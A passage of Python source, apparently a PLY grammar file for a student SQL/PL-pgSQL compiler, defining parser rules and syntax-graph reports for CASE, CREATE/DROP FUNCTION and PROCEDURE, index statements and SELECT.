graph_node(str(\"STM_EXECUTE\"), [t[1], t[2],t[3],t[4],t[5],lista,t[7],t[8],t[9]],childsProduction )\n addCad(\"**\\** ::= tExecute tIdentifier ‘(’ TEXTO ‘,’ \\ ’)’ tUsing \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n elif len(t) == 11:\n childsProduction = addNotNoneChild(t,[10])\n lista = None\n if t[7] != None:\n lista = t[7][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"STM_EXECUTE\"), [t[1], t[2],t[3],t[4],t[5],t[6],lista,t[8],t[9],t[10]],childsProduction )\n addCad(\"**\\** ::= tExecute tIdentifier ‘(’ TEXTO TEXTO ‘,’ \\ ’)’ tUsing \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n elif len(t) == 8:\n childsProduction = []\n lista = None\n if t[6] != None:\n lista = t[6][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"STM_EXECUTE\"), [t[1], t[2],t[3],t[4],t[5],lista,t[7]],childsProduction )\n addCad(\"**\\** ::= tExecute tIdentifier ‘(’ TEXTO ‘,’ \\ ’)’ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n elif len(t) == 3:\n childsProduction = addNotNoneChild(t,[2])\n graph_ref = graph_node(str(\"STM_EXECUTE\"), [t[1], t[2]],childsProduction )\n addCad(\"**\\** ::= tExecute \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n elif len(t) == 6:\n 
childsProduction = addNotNoneChild(t,[4])\n graph_ref = graph_node(str(\"STM_EXECUTE\"), [t[1], t[2], t[3], t[5]]) \n addCad(\"**\\** ::= tExecute tIdentifier ‘(’ \\ ‘)’ \")\n t[0] = FuncCall(t[2], t[4], SymbolType.STOREPROCEDURE, t.slice[1].lineno, t.slice[1].lexpos)\n elif len(t) == 5: \n graph_ref = graph_node(str(\"STM_EXECUTE\"), [t[1], t[2] ,t[3], t[4]])\n addCad(\"**\\** ::= tExecute tIdentifier ‘(’ ‘)’ \")\n t[0] = FuncCall(t[2], None, SymbolType.STOREPROCEDURE, t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n\n\ndef p_stm_get(t):\n '''stm_get : GET DIAGNOSTICS asig_basica \n '''\n\n token = t.slice[1]\n if len(t) == 4:\n childsProduction = addNotNoneChild(t,[3])\n graph_ref = graph_node(str(\"STM_GET\"), [t[1], t[2],t[3]],childsProduction )\n addCad(\"**\\** ::= tGet tDiagnostics \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n\n\n\n\n\n\ndef p_stm_case(t):\n '''stm_case : CASE id_case WHEN condition THEN case_inst when_inst case_else END CASE '''\n token = t.slice[1]\n if len(t) == 11:\n childsProduction = addNotNoneChild(t,[4,7,8])\n lista = None\n if t[2] != None:\n lista = t[2][0]\n childsProduction.append(lista.graph_ref) \n lista2 = None\n if t[6] != None:\n lista2 = t[6][0]\n childsProduction.append(lista2.graph_ref) \n graph_ref = graph_node(str(\"stm_case\"), [t[1], lista,t[3],t[4],t[5],lista2,t[7],t[8],t[9],t[10]],childsProduction )\n addCad(\"**\\** ::= tCase [\\] [\\] \\ tThen [\\] [\\] tEnd tCase \")\n t[0] = CaseNode(t[4], t[6], t[7], t[8], t.slice[1].lineno, t.slice[1].lexpos,graph_ref)\n\ndef p_id_case(t):\n '''id_case : column_list\n | empty '''\n \n token = t.slice[1]\n if token.type == \"column_list\":\n addCad(\"**\\** ::= \\ \")\n t[0]=t[1]\n else:\n t[0] = None\n #print(t)\n\n\ndef p_when_inst(t):\n '''when_inst : when_inst WHEN condition THEN case_inst\n | WHEN condition THEN case_inst '''\n \n if len(t) == 6:\n childsProduction = addNotNoneChild(t,[1,3])\n \n lista = None\n if t[5] != None:\n lista = t[5][0]\n childsProduction.append(lista.graph_ref)\n \n graph_ref = graph_node(str(\"when_inst\"), [t[1], t[2],t[3],t[4],lista],childsProduction )\n addCad(\"**\\** ::= \\ tWhen \\ tThen \\ \")\n t[0] = CaseNode(t[3], t[5], None, None, t.slice[2].lineno, t.slice[2].lexpos,graph_ref)\n #t[0]= [upNodo(\"token\", 0, 0, graph_ref)]\n if len(t) == 5: \n childsProduction = addNotNoneChild(t,[2])\n \n lista = None\n if t[4] != None:\n lista = t[4][0]\n childsProduction.append(lista.graph_ref) \n graph_ref = graph_node(str(\"when_inst\"), [t[1], t[2],t[3],lista],childsProduction )\n addCad(\"**\\** ::= tWhen \\ tThen \\ \")\n t[0] = CaseNode(t[2], t[4], None, None, t.slice[1].lineno, t.slice[1].lexpos,graph_ref)\n #t[0]= [upNodo(\"token\", 0, 0, graph_ref)]\n \n\n\ndef p_case_else(t):\n '''case_else : ELSE case_inst\n '''\n \n token = t.slice[1]\n if len(t) == 3:\n childsProduction = []\n lista = None\n if t[2] != None:\n lista = t[2][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"case_else\"), [t[1], lista],childsProduction )\n addCad(\"**\\** ::= tElse \\ \")\n t[0] = ElseNode(t[2], t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n #print(t)\n\n\ndef p_case_inst(t):\n '''case_inst : case_inst statements_sql PUNTOCOMA\n | case_inst raise_op\n | case_inst asig_basica PUNTOCOMA\n | case_inst return_ PUNTOCOMA\n | case_inst stm_if PUNTOCOMA '''\n \n token = t.slice[2]\n if token.type == \"statements_sql\":\n childsProduction = addNotNoneChild(t,[2])\n lista = None\n if t[1] != None:\n lista = t[1][0]\n 
childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"case_inst\"), [lista, t[2]],childsProduction )\n addCad(\"**\\** ::= [\\] \\ ';' \")\n if t[1] is None:\n t[2].graph_ref= graph_ref\n t[0] = [t[2]] \n else:\n t[1][0].graph_ref = graph_ref\n t[1].append(t[2])\n t[0] = t[1] \n #print(t)\n elif token.type == \"raise_op\":\n childsProduction = addNotNoneChild(t,[2])\n lista = None\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"case_inst\"), [lista, t[2]],childsProduction )\n addCad(\"**\\** ::= [\\] \\ \")\n if t[1] is None:\n t[2].graph_ref= graph_ref\n t[0] = [t[2]] \n else:\n t[1][0].graph_ref = graph_ref\n t[1].append(t[2])\n t[0] = t[1] \n #print(t)\n elif token.type == \"asig_basica\":\n childsProduction = addNotNoneChild(t,[1,2])\n lista = None\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"case_inst\"), [lista, t[2]],childsProduction )\n addCad(\"**\\** ::= [\\] \\ ';' \") \n if t[1] is None:\n t[2].graph_ref= graph_ref\n t[0] = [t[2]] \n else:\n t[1][0].graph_ref = graph_ref\n t[1].append(t[2])\n t[0] = t[1] \n\n elif token.type == \"return_\":\n lista = None\n childsProduction = addNotNoneChild(t,[2])\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"case_inst\"), [lista, t[2]],childsProduction )\n addCad(\"**\\** ::= \\ \\ ';' \")\n if t[1] is None:\n t[2].graph_ref= graph_ref\n t[0] = [t[2]] \n else:\n t[1][0].graph_ref = graph_ref\n t[1].append(t[2])\n t[0] = t[1] \n\n elif token.type == \"stm_if\":\n childsProduction = addNotNoneChild(t,[2])\n lista = None\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"case_inst\"), [lista, t[2]],childsProduction )\n addCad(\"**\\** ::= \\ \\ ';' \") \n if t[1] is None:\n t[2].graph_ref= graph_ref\n t[0] = [t[2]] \n else:\n t[1][0].graph_ref = graph_ref\n t[1].append(t[2])\n t[0] = t[1] \n\n\n\n\n\n \n\ndef p_case_inst0(t):\n '''case_inst : empty '''\n t[0] = None\n #print(t)\n\n\n\n\n\ndef p_statements_sql(t):\n '''statements_sql : stm_select\n | stm_insert\n | stm_update\n '''\n t[0]=t[1]\n\ndef p_if_opt(t):\n '''if_opt : IF\n | empty'''\n token = t.slice[1]\n if token.type == \"IF\":\n addCad(\"**\\** ::= tIf \")\n t[0] = t[1]\n else:\n t[0]=None\n\n########## >>>>>>>>>>>>>>>> CREATE FUNCTION <<<<<<<<<<<<<<<<<<<<<<\ndef p_stm_create_function(t):\n '''stm_create_function : CREATE FUNCTION ID PARA list_param_function_opt PARC RETURNS type as_opt stm_begin PUNTOCOMA DOLLAR DOLLAR LANGUAGE PLPGSQL'''\n childsProduction = addNotNoneChild(t,[8,9,10])\n #to graph list_param\n lista = None \n if t[5] != None:\n lista = t[5][0]\n childsProduction.append(lista.graph_ref) \n graph_ref = graph_node(str(\"stm_create_function\"), [t[1],t[2],t[3],t[4], lista,t[6],t[7],t[8],t[9],t[10], t[11], str(t[12]) + str(t[13]), t[14], t[15] ], childsProduction )\n addCad(\"**\\** ::= tCreate tFunction tIdentifier '(' [\\] ')' tReturns \\ [\\] \\ ';' '$$' tLanguage tPlpgsql\")\n t[0] = Function(t[3], t[5], t[8], t[10], t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n\n\ndef p_list_param_function_opt(t):\n '''list_param_function_opt : params_function \n | empty'''\n token = t.slice[1] \n if token.type == \"params_function\":\n lista = None\n childsProduction = []\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref) \n graph_ref = graph_node(str(\"list_param_function_opt\"), 
[lista], childsProduction )\n addCad(\"**\\** ::= [\\] \")\n t[1][0].graph_ref = graph_ref\n t[0] = t[1]\n else:\n t[0]=None\n\n\ndef p_params_function(t):\n '''params_function : params_function COMA param_function\n | param_function'''\n token = t.slice[1]\n if token.type == \"params_function\":\n lista = None\n childsProduction = addNotNoneChild(t,[3])\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"params_function\"), [lista, t[2], t[3]] ,childsProduction )\n addCad(\"**\\** ::= \\ ',' \\ \")\n t[1][0].graph_ref = graph_ref\n t[1].append(t[3])\n t[0] = t[1] \n else:\n childsProduction = addNotNoneChild(t,[1])\n graph_ref = graph_node(str(\"params_function\"), [t[1]], childsProduction )\n addCad(\"**\\** ::= \\ \")\n t[1].graph_ref = graph_ref \n t[0] = [t[1]]\n\n\ndef p_param_function(t):\n '''param_function : ID\n | type'''\n token = t.slice[1]\n if token.type == \"ID\":\n graph_ref = graph_node(str(t[1]))\n addCad(\"**\\** ::= tIdentifier \")\n t[0] = Parameter(t[1], None, None, token.lineno, token.lexpos, graph_ref)\n \n else:\n childsProduction = addNotNoneChild(t,[1])\n graph_ref = graph_node(str(\"param_function\"), [t[1]], childsProduction )\n addCad(\"**\\** ::= \\ \")\n t[0] = Parameter(None, None, t[1], token.value.line, token.value.column, graph_ref)\n \n\n\ndef p_param_function_1(t):\n '''param_function : ID type\n | param_mode ID type'''\n token = t.slice[1]\n if token.type == \"ID\":\n childsProduction = addNotNoneChild(t,[2])\n graph_ref = graph_node(str(\"param_function \"), [t[1],t[2]], childsProduction )\n addCad(\"**\\** ::= tIdentifier \\\")\n t[0] = Parameter(t[1], None, t[2], token.lineno, token.lexpos, graph_ref)\n\n else:\n childsProduction = addNotNoneChild(t,[1,3])\n graph_ref = graph_node(str(\"param_function \"), [t[1], t[2], t[3]], childsProduction )\n addCad(\"**\\** ::= [\\]tIdentifier \\\")\n t[0] = Parameter(t[2], t[1], t[3], token.lineno, token.lexpos, graph_ref)\n\n\ndef p_param_mode(t):\n '''param_mode : IN\n | OUT\n | INOUT'''\n token = t.slice[1]\n graph_ref = graph_node(str(t[1]))\n addCad(\"**\\** ::= \"+ str(token.type))\n t[0] = ParamMode(t[1], t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n\n\n\n\ndef p_as_opt(t):\n '''as_opt : AS DOLLAR DOLLAR\n | empty'''\n if len(t) == 4:\n graph_ref = graph_node(str(\"as_opt\"), [t[1],t[2],t[3]], [] )\n addCad(\"**\\** ::= tAs '$$' ';' \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #####\n else:\n t[0]=None\n\n\ndef p_declares_opt_0(t):\n '''declares_opt : declares_opt DECLARE declarations'''\n lista = None\n childsProduction = []\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n lista2 = None\n if t[3] != None:\n lista2 = t[3][0]\n childsProduction.append(lista2.graph_ref)\n graph_ref = graph_node(str(\"declares_opt\"), [lista, t[2], lista2], childsProduction )\n addCad(\"**\\** ::= [\\] tDeclare \\ \")\n if t[1] != None:\n #t[1][0].graph_ref = graph_ref\n t[1].extend(t[3])\n t[1][0].graph_ref = graph_ref\n t[0] = t[1]\n else: \n t[3][0].graph_ref = graph_ref\n t[0] = t[3]\n #####\n\n \ndef p_declares_opt_1(t):\n '''declares_opt : empty'''\n t[0] = None\n\ndef p_declarations(t):\n '''declarations : declarations declaration\n | declaration'''\n token = t.slice[1]\n if token.type == \"declarations\":\n lista = None\n childsProduction = addNotNoneChild(t,[2])\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n \n graph_ref = graph_node(str(\"declarations\"), [lista,t[2]], 
childsProduction )\n addCad(\"**\\** ::= [\\] \\ \")\n t[1][0].graph_ref = graph_ref \n t[1].append(t[2])\n t[0] = t[1]\n #####\n else:\n addCad(\"**\\** ::= \\ \")\n t[0] = [t[1]]\n \ndef p_declaration(t):\n '''declaration : ID constant_opt type collate_opt not_null_opt expression_opt PUNTOCOMA \n | ID ALIAS FOR DOLLAR ENTERO PUNTOCOMA'''\n if len(t) == 8:\n childsProduction = addNotNoneChild(t,[2,3,4,5,6])\n graph_ref = graph_node(str(\"declaration\"), [t[1],t[2],t[3],t[4],t[5],t[6],t[7]], childsProduction )\n addCad(\"**\\** ::= tIdentifier \\ \\ \\ \\ \\ ';' \")\n t[0] = Declaration(t[1], t[2] is not None, t[3], True, t[6], None, t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n elif len(t) == 7:\n graph_ref = graph_node(str(\"declaration\"), [t[1],t[2],t[3],t[4],t[5],t[6]], [] )\n addCad(\"**\\** ::= tId tAlias tFor $ tEntero ';' \")\n t[0] = Declaration(t[1], False, None, True, None, t[5], t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n\ndef p_declaration_1(t):\n '''declaration : ID ID PORCENTAJE ROWTYPE PUNTOCOMA\n | ID ID PUNTO ID PORCENTAJE TYPE PUNTOCOMA\n | ID RECORD PUNTOCOMA'''\n if len(t) == 6:\n graph_ref = graph_node(str(\"declaration\"), [t[1], str(t[2]) + str(t[3]) +str(t[4]), t[5]], [] )\n addCad(\"**\\** ::= tIdentifier tIdentifier '%' tRowtype ';' \")\n t[0] = Declaration(t[1], False, t[4], True, None, None, t.slice[1].lineno, t.slice[1].lexpos, graph_ref )\n elif len(t) == 8:\n graph_ref = graph_node(str(\"declaration\"), [t[1], str(t[2]) + str(t[3]) + str(t[4]) + str(t[5]) + str(t[6]), t[7]], [] )\n addCad(\"**\\** ::= tIdentifier tIdentifier tPunto '%' tType\")\n t[0] = Declaration(t[1], False, t[6], True, None, None, t.slice[1].lineno, t.slice[1].lexpos, graph_ref )\n elif len(t) == 4:\n graph_ref = graph_node(str(\"declaration\"), [t[1],t[2],t[3]], [] )\n addCad(\"**\\** ::= tIdentifier tRecord ',' \")\n t[0] = Declaration(t[1], False, t[2], True, None, None, t.slice[1].lineno, t.slice[1].lexpos, graph_ref )\n\n\ndef p_constant_opt(t):\n '''constant_opt : CONSTANT\n | empty'''\n token = t.slice[1]\n if token.type != \"empty\":\n graph_ref = graph_node(str(t[1]))\n addCad(\"**\\** ::= tConstant \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n else: \n t[0] = None \n\ndef p_collate_opt(t):\n '''collate_opt : COLLATE ID\n | empty'''\n token = t.slice[1]\n if token.type != \"empty\":\n graph_ref = graph_node(str(\"collate_opt\"), [t[1],t[2]], [] )\n addCad(\"**\\** ::= tCollate tIdentifier \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n else: \n t[0] = None\n\ndef p_not_null_opt(t):\n '''not_null_opt : NOT NULL\n | empty''' \n token = t.slice[1]\n if token.type != \"empty\":\n graph_ref = graph_node(str(str(t[1]) +\" \"+str(t[2]) ))\n addCad(\"**\\** ::= tNot tNull \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n else: \n t[0] = None\n\n\ndef p_expression_opt(t):\n '''expression_opt : DEFAULT expression\n | DOSPUNTOS IGUAL expression\n | IGUAL expression\n | empty'''\n token = t.slice[1]\n if token.type == \"DEFAULT\":\n childsProduction = addNotNoneChild(t,[2])\n graph_ref = graph_node(str(\"expression_opta\"), [t[1], t[2]] , childsProduction)\n addCad(\"**\\** ::= tDefault \\ \")\n t[2].graph_ref = graph_ref \n t[0] = t[2]\n ##### \n elif token.type == \"DOSPUNTOS\":\n childsProduction = addNotNoneChild(t,[3])\n graph_ref = graph_node(str(\"expression_opt\"), [str(t[1]) + \" \" + str(t[2]),t[3]] , childsProduction)\n addCad(\"**\\** ::= ':=' \\ \")\n t[3].graph_ref = graph_ref \n t[0] = t[3]\n ##### \n elif token.type == 
\"IGUAL\":\n childsProduction = addNotNoneChild(t,[2])\n graph_ref = graph_node(str(\"expression_opt\"), [t[1], t[2]] , childsProduction)\n addCad(\"**\\** ::= '=' \\ \")\n t[2].graph_ref = graph_ref \n t[0] = t[2]\n ##### \n else:\n t[0] = None\n\ndef p_stm_drop_function(t):\n '''stm_drop_function : DROP FUNCTION if_exists_opt ID mode_drop_function_opt'''\n tokenID = t.slice[4]\n childsProduction = addNotNoneChild(t,[3,5])\n graph_ref = graph_node(str(\"stm_drop_function\"), [t[1],t[2],t[3],t[4], t[5]], childsProduction )\n addCad(\"**\\** ::= tDrop tFunction [\\] tIdentifier [\\]\")\n name_func = Identifier(tokenID.value, tokenID.lineno, tokenID.lexpos, None)\n t[0] = DropFunction(name_func,(True if t[3] else False), t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n\n\ndef p_stm_drop_procedure(t):\n '''stm_drop_procedure : DROP PROCEDURE if_exists_opt ID mode_drop_function_opt '''\n tokenID = t.slice[4]\n childsProduction = addNotNoneChild(t,[3, 5])\n graph_ref = graph_node(str(\"stm_drop_procedure\"), [t[1],t[2],t[3],t[4],t[5]], childsProduction )\n addCad(\"**\\** ::= tDrop tProcedure [\\] tIdentifier [\\]\")\n name_proc = Identifier(tokenID.value, tokenID.lineno, tokenID.lexpos, None)\n t[0] = DropProcedure(name_proc,(True if t[3] else False), t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n\n \ndef p_name_list(t):\n '''name_list : name_list COMA ID\n | ID'''\n if len(t) == 4:\n lista = None\n childsProduction = []\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"name_list\"), [lista, t[2], t[3]], childsProduction)\n addCad(\"**\\** ::= \\ ',' tIdentifier \")\n token_id = t.slice[3]\n t[1][0].graph_ref = graph_ref\n t[1].append(Identifier(token_id.value, token_id.lineno, token_id.lexpos, graph_ref))\n t[0] = t[1]\n else:\n graph_ref = graph_node(str(t[1]))\n addCad(\"**\\** ::= tIdentifier \")\n token_id = t.slice[1]\n t[0] = [Identifier(token_id.value, token_id.lineno, token_id.lexpos, graph_ref)]\n\n\ndef p_mode_drop_function_opt(t):\n '''mode_drop_function_opt : CASCADE\n | RESTRICT\n | empty'''\n token = t.slice[1]\n if token.type == \"CASCADE\":\n graph_ref = graph_node(str(t[1]) )\n addCad(\"**\\** ::= tCascade \")\n t[0] = upNodo(True, 0, 0, graph_ref)\n #####\n elif token.type == \"RESTRICT\":\n graph_ref = graph_node(str(t[1]) )\n addCad(\"**\\** ::= tRestrict \")\n t[0] = upNodo(True, 0, 0, graph_ref)\n #####\n else:\n t[0]=None\n\n########## >>>>>>>>>>>>>>>> CREATE PROCEDURE <<<<<<<<<<<<<<<<<<<<<<\n#TODO: check graph ref\ndef p_stm_create_procedure(t):\n '''stm_create_procedure : CREATE PROCEDURE ID PARA list_param_function_opt PARC LANGUAGE PLPGSQL AS DOLLAR DOLLAR stm_begin PUNTOCOMA DOLLAR DOLLAR'''\n childsProduction = addNotNoneChild(t,[12])\n lista = None \n if t[5] != None:\n lista = t[5][0]\n childsProduction.append(lista.graph_ref) \n srt_report = \"**\\** ::= tCreate tProcedure tIdentifier '(' [\\] ')' tLanguage tPlpgsql tAs \\ ';' '$$'\"\n graph_ref = graph_node(str(\"stm_create_procedure\"), [t[1],t[2],t[3],t[4], lista,t[6],t[7],t[8],t[9],str(t[10]) + str(t[11]),t[12],t[13], str(t[14]) + str(t[15])], childsProduction )\n addCad(srt_report)\n t[0] = Function(t[3], t[5], None, t[12], t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n\n\n\n\n\n########## >>>>>>>>>>>>>>>> INDEX <<<<<<<<<<<<<<<<<<<<<<\ndef p_stm_index(t):\n '''stm_index : CREATE unique_opt INDEX ID ON ID using_hash_opt PARA params_index PARC where_clause_opt '''\n lista = None\n childsProduction = addNotNoneChild(t,[2,7,11])\n if t[9] 
!= None:\n lista = t[9][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"stm_index\"), [t[1],t[2],t[3],t[4],t[5],t[6],t[7],t[8],lista,t[10],t[11]], childsProduction )\n addCad(\"**\\** ::= tCreate [\\] tIndex tIdentifier tOn tIdentifier \\ '(' \\ ')' \\ \")\n t[0] = CreateIndex(True if t[2] is not None else False, True if t[7] is not None else False, t[4], t[6], t[9], t[11], t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n\ndef p_params_index(t):\n '''params_index : params_index COMA param_index\n | param_index'''\n token = t.slice[1]\n if token.type == \"params_index\":\n lista = None\n childsProduction = addNotNoneChild(t, [3])\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"params_index\"), [lista,t[2], t[3]], childsProduction)\n addCad(\"**\\** ::= [\\] ',' \")\n t[1][0].graph_ref = graph_ref\n t[1].append(t[3])\n t[0] = t[1]\n #####\n else:\n childsProduction = addNotNoneChild(t,[1])\n graph_ref = graph_node(str(\"params_index\"), [t[1]], childsProduction )\n addCad(\"**\\** ::= \")\n t[1].graph_ref = graph_ref\n t[0] = [t[1]]\n\n\ndef p_param_index_0(t):\n '''param_index : ID order_opt'''\n childsProduction = addNotNoneChild(t,[2])\n graph_ref = graph_node(str(\"param_index\"), [t[1], t[2]], childsProduction)\n addCad(\"**\\** ::= tIdendtifier \\\")\n t[0] = IndexAtributo(None,t[1],(t[2].val if t[2] else None),None,None,t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n #####\n\ndef p_param_index_1(t):\n '''param_index : ID order_opt NULLS FIRST\n | ID order_opt NULLS LAST'''\n token = t.slice[3]\n if token.type == \"FIRST\":\n childsProduction = addNotNoneChild(t,[2])\n graph_ref = graph_node(str(\"param_index\"), [t[1], t[2], str(t[3]) + \" \" + str(t[4])], childsProduction)\n addCad(\"**\\** ::= tIdentifier \\ tNUlls tFirst \")\n t[0] = IndexAtributo(None,t[1],(t[2].val if t[2] else None),t[3],t[4],t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n #####\n else:\n childsProduction = addNotNoneChild(t,[2])\n graph_ref = graph_node(str(\"param_index\"), [t[1], t[2], str(t[3]) + \" \" + str(t[4])], childsProduction)\n addCad(\"**\\** ::= tIdentifier \\ tNulls tLast \")\n t[0] = IndexAtributo(None,t[1],(t[2].val if t[2] else None),t[3],t[4],t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n #####\n\n\ndef p_param_index_2(t):\n '''param_index : expression'''\n childsProduction = addNotNoneChild(t,[1])\n graph_ref = graph_node(str(\"param_index\"), [t[1]], childsProduction)\n addCad(\"**\\** ::= \\\")\n t[0] = IndexAtributo(t[1],t[1], None,None,None,0, 0, graph_ref)\n #####\n\n\ndef p_order_opt(t):\n '''order_opt : DESC\n | ASC\n | empty'''\n token = t.slice[1]\n if token.type == \"DESC\":\n graph_ref = graph_node(str(t[1]) )\n addCad(\"**\\** ::= tDesc \")\n t[0] = Identifier(token.value, token.lineno, token.lexpos, graph_ref)\n #####\n elif token.type == \"ASC\":\n graph_ref = graph_node(str(t[1]) )\n addCad(\"**\\** ::= tAsc \")\n t[0] = Identifier(token.value, token.lineno, token.lexpos, graph_ref)\n #####\n else:\n t[0] = None\n\n\ndef p_unique_opt(t):\n '''unique_opt : UNIQUE\n | empty'''\n token = t.slice[1]\n if token.type == \"UNIQUE\":\n graph_ref = graph_node(str(t[1]) )\n addCad(\"**\\** ::= tUnique \")\n t[0] = Identifier(token.value, token.lineno, token.lexpos, graph_ref)\n #####\n else:\n t[0] = None\n\ndef p_using_hash_opt(t):\n '''using_hash_opt : USING HASH\n | empty'''\n token = t.slice[1]\n if token.type == \"USING\":\n graph_ref = graph_node(str(str(t[1]) + \" \" + 
str(t[2])))\n addCad(\"**\\** ::= tUsing tHash \")\n t[0] = Identifier(str(\"USING HASH\"), token.lineno, token.lexpos, graph_ref)\n #####\n else:\n t[0] = None\n\n########## >>>>>>>>>>>>>>>> DROP INDEX <<<<<<<<<<<<<<<<<<<<<<\ndef p_stm_drop_index(t):\n '''stm_drop_index : DROP INDEX concurrently_opt if_exists_opt ID mode_drop_function_opt'''\n token = t.slice[1]\n childsProduction = addNotNoneChild(t, [3,4,6])\n graph_ref = graph_node(str(\"stm_drop_index\"), [t[1], t[2],t[3], t[4], t[5],t[6]], childsProduction)\n addCad(\"**\\** ::= tDrop tIndex [\\] [\\] tIdentifier [\\] \")\n t[0] = DropIndex(t[3], t[4], t[5], t[6], token.lineno, token.lexpos, graph_ref)\n #####\n\ndef p_concurrently_opt(t):\n '''concurrently_opt : CONCURRENTLY\n | empty'''\n token = t.slice[1]\n if token.type == \"CONCURRENTLY\" :\n graph_ref = graph_node(str(t[1]) )\n addCad(\"**\\** ::= tConcurrently \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n else:\n t[0] = None\n\n########## >>>>>>>>>>>>>>>> ALTER INDEX <<<<<<<<<<<<<<<<<<<<<<\ndef p_stm_alter_index(t):\n '''stm_alter_index : ALTER INDEX if_exists_opt ID ALTER COLUMN ID ID '''\n token = t.slice[1]\n childsProduction = addNotNoneChild(t, [3])\n graph_ref = graph_node(str(\"stm_alter_index\"), [t[1], t[2],t[3], t[4], t[5], t[6], t[7], t[8]], childsProduction)\n addCad(\"**\\** ::= tAlter tIndex [\\] tIdentifier tAlter tColumn tIdentifier tIdentifier \")\n t[0] = AlterIndex(t[3], t[4], t[7], t[8], token.lineno, token.lexpos, graph_ref)\n\n\ndef p_column_opt(t):\n '''column_opt : COLUMN\n | empty''' \n token = t.slice[1]\n if token.type == \"COLUMN\" :\n graph_ref = graph_node(str(\"column_opt\"), [t[1]], [])\n addCad(\"**\\** ::= tColumn\")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #### \n else:\n t[0] = None\n\n\n\n##################################################\n\n\ndef p_all_opt(t):\n '''all_opt : ALL\n | empty'''\n token = t.slice[1]\n if token.type == \"ALL\":\n graph_ref = graph_node(str(t[1]))\n addCad(\"**\\** ::= tAll \")\n t[0] = upNodo(True, 0, 0, graph_ref)\n ##### \n else:\n t[0] = None\n\n\ndef p_stm_select(t):\n '''stm_select : SELECT distinct_opt list_names FROM table_list where_clause_opt group_clause_opt having_clause_opt order_by_opt limit_opt offset_opt\n | SELECT distinct_opt list_names '''\n if len(t) == 4:\n lista = None\n childsProduction = addNotNoneChild(t, [2])\n if t[3] != None:\n lista = t[3][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"stm_select\"), [t[1], t[2], lista], childsProduction)\n addCad(\"**\\** ::= tSelect \\ \\ \")\n t[0] = Select(False, t[3], None, None, None, None, None, None, None, t.slice[1].lineno, t.slice[1].lexpos,\n graph_ref)\n else:\n lista = None\n lista2 = None\n childsProduction = addNotNoneChild(t, [2, 6, 7, 8, 9, 10, 11])\n if t[3] != None:\n lista = t[3][0]\n childsProduction.append(lista.graph_ref)\n if t[5] != None:\n lista2 = t[5][0]\n childsProduction.append(lista2.graph_ref)\n graph_ref = graph_node(str(\"stm_select\"),\n [t[1], t[2], lista, t[4], lista2, t[6], t[7], t[8], t[9], t[10], t[11]],\n childsProduction)\n addCad(\n \"**\\** ::= tSelect \\ \\ tFrom \\ \\ \\\\ \\ \")\n t[0] = Select(True if t[2] else False, t[3], t[5], t[6], t[7], t[8], t[9], t[10], t[11], t.slice[1].lineno,\n t.slice[1].lexpos, graph_ref)\n\n\ndef p_distinct_opt(t):\n '''distinct_opt : not_opt DISTINCT\n | empty'''\n\n if len(t) == 3:\n childsProduction = addNotNoneChild(t, [1])\n graph_ref = graph_node(str(\"distinct_opt\"), [t[1], t[2]], childsProduction)\n addCad(\"**\\** 
